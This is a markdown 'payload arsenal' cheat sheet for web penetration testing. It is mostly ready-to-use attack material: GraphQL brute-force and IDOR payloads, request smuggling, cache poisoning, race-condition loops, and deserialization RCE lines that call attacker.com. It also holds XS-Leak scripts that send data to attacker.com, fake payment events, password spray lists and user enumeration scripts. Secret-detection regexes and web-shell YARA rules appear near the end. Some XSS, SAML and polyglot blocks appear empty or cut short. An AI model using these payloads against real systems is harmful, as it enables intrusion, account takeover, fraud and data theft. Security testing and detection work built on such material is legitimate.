# Security Payload Arsenal Complete reference library. Organized by vulnerability class. For authorized testing only. > **Authorization required.** Only use against systems you own or have explicit written permission to test. --- ## XSS Payloads ### Basic ```html ``` ### SameSite=Lax Bypass ```html ``` ### Next.js Server Actions ```bash curl -s https://TARGET/ | grep -oE '\$ACTION_ID_[a-f0-9]+' curl -X POST https://TARGET/ -H "Content-Type: multipart/form-data; boundary=----x" -H "Origin: null" \ --data-binary $'------x\r\nContent-Disposition: form-data; name="$ACTION_ID_HASH"\r\n\r\n\r\n------x--' ``` --- ## GraphQL Payloads ### Introspection ```graphql { __schema { types { name fields { name type { name } } } } } ``` ### Introspection Bypass ```graphql { __schema\n{ types { name } } } { __schema\t{ types { name } } } ``` ### Batching (rate limit / 2FA brute force) ```json [{"query":"mutation{login(otp:\"0000\")}"},{"query":"mutation{login(otp:\"0001\")}"}] ``` ### Alias Batching ```graphql { a1: user(id:1){email} a2: user(id:2){email} a3: user(id:3){email} } ``` ### IDOR ```graphql mutation { updateEmail(userId: "VICTIM_ID", email: "attacker@evil.com") { success } } ``` --- ## HTTP Request Smuggling ### CL.TE ```http POST / HTTP/1.1 Host: TARGET Content-Length: 6 Transfer-Encoding: chunked 0 G ``` ### TE.CL ```http POST / HTTP/1.1 Host: TARGET Content-Length: 3 Transfer-Encoding: chunked 8 SMUGGLED 0 ``` ### TE Obfuscation ``` Transfer-Encoding: xchunked Transfer-Encoding: chunked Transfer-Encoding:[tab]chunked [space]Transfer-Encoding: chunked ``` --- ## Web Cache Poisoning ### X-Forwarded-Host Injection ```bash curl -H "X-Forwarded-Host: evil.com" https://TARGET/page ``` ### Cache Deception ``` https://TARGET/account/settings.js https://TARGET/account;.js https://TARGET/account%3B.js ``` ### Unkeyed Header Injection ``` X-Forwarded-For: "> X-Original-URL: /admin ``` --- ## Race Condition ### Shell (curl parallel) ```bash seq 20 | xargs -P 20 -I {} curl -s -X POST https://TARGET/redeem \ -H "Authorization: Bearer $TOKEN" -d 'code=PROMO10' & wait ``` ### TOCTOU Targets ``` POST /api/cart/coupon (coupon redemption) POST /api/gift-card/redeem (gift card) POST /api/transfer (fund transfer) POST /api/vote (counter) POST /api/otp/verify (OTP brute via racing) ``` --- ## OIDC Attack Payloads ### Cross-Origin Token Exchange (CORS wildcard) ```javascript const res = await fetch('https://TARGET/api/v1/oidc/token', { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: new URLSearchParams({ grant_type: 'authorization_code', code: 'STOLEN_CODE', client_id: 'app_TARGET', client_secret: 'SECRET', redirect_uri: 'https://app.com/callback' }) }); ``` ### Open Redirect in Login ``` https://TARGET/api/auth/login?returnTo=https://evil.com/phish https://TARGET/api/auth/login?returnTo=//evil.com ``` ### Host Header Injection ```bash curl -H "X-Forwarded-Host: evil.com" -H "X-Forwarded-Proto: https" https://TARGET/api/login-callback ``` --- ## Timing Side-Channel ### Detect Unsafe Comparison ```bash grep -rn "\.digest(" --include="*.ts" --include="*.js" -A 3 | grep "===" grep -rn "timingSafeEqual" --include="*.ts" ``` ### Local Timing Measurement ```javascript const {performance} = require('perf_hooks'); function measure(fn, a, b, n=500000) { for(let i=0;i<10000;i++) fn(a,b); const s=performance.now(); for(let i=0;ia===b, t, '0'.repeat(64))); console.log('full:', measure((a,b)=>a===b, t, t)); ``` --- ## CRLF Injection ``` %0d%0aHeader: injected %0aHeader: injected %23%0dHeader: injected ``` --- ## LDAP Injection ``` * )(uid=*))(|(uid=* *))(|(password=* *))%00 admin)(&) ``` --- ## File Upload Bypass ### Extension Bypass ``` .php .php3 .php4 .php5 .phtml .phar .shtml .asp .aspx .ashx .cer .jsp .jspx .jspf file.php.jpg file.php%00.jpg ``` ### Content-Type Bypass ``` Content-Type: image/jpeg (with .php extension) GIF89a; ``` --- ## Mass Assignment ### Common Payloads ```json {"username":"user","email":"u@e.com","isAdmin":true} {"username":"user","role":"admin"} {"price":0.01,"discount":100} {"plan":"enterprise","trial_days":9999} {"user_id":1,"account_id":VICTIM_ID} ``` ### Where to Find - Registration forms (add `role`, `isAdmin`, `admin`, `is_staff`) - Profile edit (add `credits`, `balance`, `plan`) - API PUT/PATCH endpoints — always try adding undocumented fields - Rails / Django / Laravel / Spring Boot apps --- ## Insecure Deserialization ### Identify Serialized Data | Type | Hex Header | Base64 Prefix | |------|------------|---------------| | Java | `AC ED` | `rO` | | PHP | `4F 3A` | `Tz` | | Python Pickle | `80 04 95` | `gASV` | | Ruby Marshal | `04 08` | `BAgK` | | .NET BinaryFormatter | `FF 01` | `/w` | ### Exploitation Tools ```bash # Java — ysoserial java -jar ysoserial.jar CommonsCollections6 "curl attacker.com/$(id | base64)" | base64 java -jar ysoserial.jar URLDNS http://attacker.com # detection only # PHP — phpggc phpggc Laravel/RCE1 system "id" # Python pickle RCE python3 -c " import pickle, os, base64 class RCE: def __reduce__(self): return (os.system, ('curl attacker.com',)) print(base64.b64encode(pickle.dumps(RCE())).decode()) " ``` --- ## SAML Attacks ### Signature Stripping ```xml admin ``` ### XML Comment Injection (CVE-2017-11427-30) ```xml user@target.com ``` ### XXE in SAML ```xml ]> ...&xxe; ``` ### XML Signature Wrapping (XSW) Variants | Variant | Structure | |---------|-----------| | XSW1 | Clone unsigned Response appended AFTER existing signature | | XSW2 | Clone unsigned Response inserted BEFORE existing signature | | XSW3 | Clone unsigned Assertion inserted BEFORE legitimate signed Assertion | | XSW4 | Clone unsigned Assertion wrapped INSIDE legitimate Assertion | | XSW7 | Add `` block containing cloned unsigned Assertion | | XSW8 | Add `` block containing original Assertion without its signature | --- ## XS-Leaks (Cross-Site Information Leaks) ### XS-Search (Boolean Oracle) ```javascript let win = window.open('https://target.com/search?q=GUESS'); setTimeout(() => { if (win.length > 0) { fetch('https://attacker.com/?hit='+encodeURIComponent('GUESS')); } win.close(); }, 1000); ``` ### Timing Oracle ```javascript let start = performance.now(); let img = new Image(); img.onload = img.onerror = () => { let delta = performance.now() - start; fetch('https://attacker.com/?t='+delta); }; img.src = 'https://target.com/api/profile?id=VICTIM'; ``` ### Error Oracle (Status Code Leak) ```javascript let s = document.createElement('script'); s.onerror = () => fetch('https://attacker.com/?status=error'); s.onload = () => fetch('https://attacker.com/?status=success'); s.src = 'https://target.com/api/secret'; document.head.appendChild(s); ``` ### Oracle Quick Reference | Oracle | What It Leaks | |--------|---------------| | Frame count (`win.length`) | iframes on page = user state / search results | | Script `onload`/`onerror` | HTTP status code of cross-origin resource | | `` `onload`/`onerror` | Resource exists or not | | Performance API `transferSize` | Response size | | `response.redirected` (Fetch) | Any redirect happened | | `history.length` | JS redirects occurred | --- ## MiniKit / WebView Event Spoofing ```javascript // Fake payment success MiniKit.trigger('miniapp-payment', { status:'success', transaction_id:'0xFAKE', reference:'ORDER' }); // Fake World ID verification MiniKit.trigger('miniapp-verify-action', { status:'success', proof:'0x'+'00'.repeat(256), merkle_root:'0x'+'00'.repeat(32), nullifier_hash:'0x'+'ab'.repeat(32), verification_level:'orb' }); // Fake wallet auth MiniKit.trigger('miniapp-wallet-auth', { status:'success', message:'FAKE_SIWE', signature:'0x'+'00'.repeat(65), address:'0xTARGET', version:2 }); ``` --- ## Encoding Reference | Encoding | `<` | `>` | `"` | `'` | `/` | |----------|-----|-----|-----|-----|-----| | URL | %3C | %3E | %22 | %27 | %2F | | Double URL | %253C | %253E | %2522 | %2527 | %252F | | HTML | < | > | " | ' | / | | Unicode | \u003c | \u003e | \u0022 | \u0027 | \u002f | --- ## Fuzzing — Special Characters (WAF Testing) ``` ' " ` ~ ! @ # $ % ^ & * ( ) - + = { } [ ] | \ : ; < > ? , . / ``` --- # WORDLISTS ## Password Lists ### Top 50 Most Common ``` 123456 password 123456789 12345678 12345 1234567 qwerty abc123 000000 iloveyou 111111 password1 123123 admin letmein welcome monkey dragon master sunshine princess passw0rd shadow superman password123 qwerty123 admin123 root toor pass test guest user login changeme default ``` ### Default Service Credentials | Service | Username | Password | |---------|----------|----------| | WordPress/Joomla | admin | admin | | Tomcat | tomcat | tomcat | | Jenkins/Grafana | admin | admin | | MySQL | root | (empty)/root | | PostgreSQL | postgres | postgres | | MSSQL | sa | (empty)/sa | | Cisco | cisco/admin | cisco/admin | | Netgear | admin | password | | Ubiquiti | ubnt | ubnt | ### Password Spray (seasonal) ``` Winter2025! Spring2025! Summer2025! Fall2025! Password1! Welcome1! Company1! Company@1 January2025! ... December2025! ``` --- ## Username Lists ### Universal Defaults ``` admin administrator root user test guest demo superuser sysadmin support operator manager service default ``` ### Database ``` root sa postgres oracle mysql dba sysdba mongodb redis ``` ### User Enumeration Techniques ```bash # Response size difference curl -s -o /dev/null -w "%{http_code} %{size_download}" -X POST https://target.com/login -d "username=admin&password=wrong" # Forgot password oracle for user in admin root test; do response=$(curl -s -X POST https://target.com/forgot-password -d "email=${user}@target.com") echo "$user: ${#response} bytes" done # ffuf enumeration ffuf -u https://target.com/login -X POST -d "username=FUZZ&password=wrong" -w usernames.txt -fs 1234 ``` --- # SECRET DETECTION PATTERNS ## API Keys & Tokens ```regex # AWS Access Key AKIA[0-9A-Z]{16} # AWS Secret (?i)aws.{0,20}['"][0-9a-zA-Z\/+]{40}['"] # Google API Key AIza[0-9A-Za-z\-_]{35} # GitHub PAT ghp_[0-9a-zA-Z]{36} # Stripe Secret sk_live_[0-9a-zA-Z]{24} # Slack Token xox[baprs]-([0-9a-zA-Z]{10,48})? # SendGrid SG\.[a-zA-Z0-9\-_]{22}\.[a-zA-Z0-9\-_]{43} # Shopify shpat_[a-fA-F0-9]{32} # Generic key=value (?i)(api[_-]?key|secret[_-]?key|access[_-]?key|auth[_-]?token)\s*[=:]\s*['"]?([a-zA-Z0-9_\-.]{16,})['"]? # JWT eyJ[a-zA-Z0-9_\-]+\.eyJ[a-zA-Z0-9_\-]+\.[a-zA-Z0-9_\-]+ ``` ## Cryptographic Material ```regex -----BEGIN [A-Z ]*PRIVATE KEY----- -----BEGIN OPENSSH PRIVATE KEY----- -----BEGIN CERTIFICATE----- ``` ## PII Patterns ```regex # Visa 4[0-9]{12}(?:[0-9]{3})? # US SSN (?!219-09-9999|078-05-1120)(?!666|000|9\d{2})\d{3}-(?!00)\d{2}-(?!0{4})\d{4} # Email [a-zA-Z0-9._%+\-]+@[a-zA-Z0-9.\-]+\.[a-zA-Z]{2,} # IPv4 \b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b ``` ## Secret Scanning Commands ```bash # AWS keys grep -rE "AKIA[0-9A-Z]{16}" . # Private keys grep -rE "-----BEGIN [A-Z ]*PRIVATE KEY-----" . # All potential secrets grep -rE "(?i)(password|secret|api_key|token|auth)\s*[=:]\s*['\"][^'\"]{8,}" . # JWT tokens grep -rE "eyJ[a-zA-Z0-9_-]+\.eyJ[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+" . # Automated trufflehog git https://github.com/target/repo --only-verified gitleaks detect --source . --report-format json ``` --- # WEB SHELL DETECTION ## PHP Signatures ```regex eval\s*\(\s*(base64_decode|str_rot13|gzinflate|gzuncompress) \b(system|exec|passthru|shell_exec|proc_open|popen)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE) eval\s*\(\s*\$_(GET|POST|REQUEST|COOKIE) assert\s*\(\s*\$_(GET|POST|REQUEST|COOKIE) ``` ## YARA Rules ```yara rule PHP_Webshell_Generic { strings: $eval_get = /eval\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)/ $eval_b64 = /eval\s*\(\s*base64_decode\s*\(/ $system_get = /system\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)/ condition: any of them } ``` ## Detection Commands ```bash grep -rn "eval(base64_decode" /var/www/html/ grep -rn "system(\$_" /var/www/html/ find /var/www/html -type f -name "*.php" -newer /tmp/ref -ls grep "POST" /var/log/apache2/access.log | grep "\.php" | grep -v "wp-login\|wp-admin" ``` --- ## Polyglots ### XSS/SQLi ``` ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> ``` ### XXE/SSRF (SVG) ```xml ]> ``` --- ## External References - [SecLists](https://github.com/danielmiessler/SecLists) — Comprehensive wordlists - [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) — 65 payload categories - [HowToHunt](https://github.com/KathanP19/HowToHunt) — 44 vuln categories, step-by-step - [HackTricks](https://book.hacktricks.xyz/) — Attack technique bible - [DefaultCreds](https://github.com/ihebski/DefaultCreds-cheat-sheet) — Default credentials - [xsinator.com](https://xsinator.com) — XS-Leak automated testing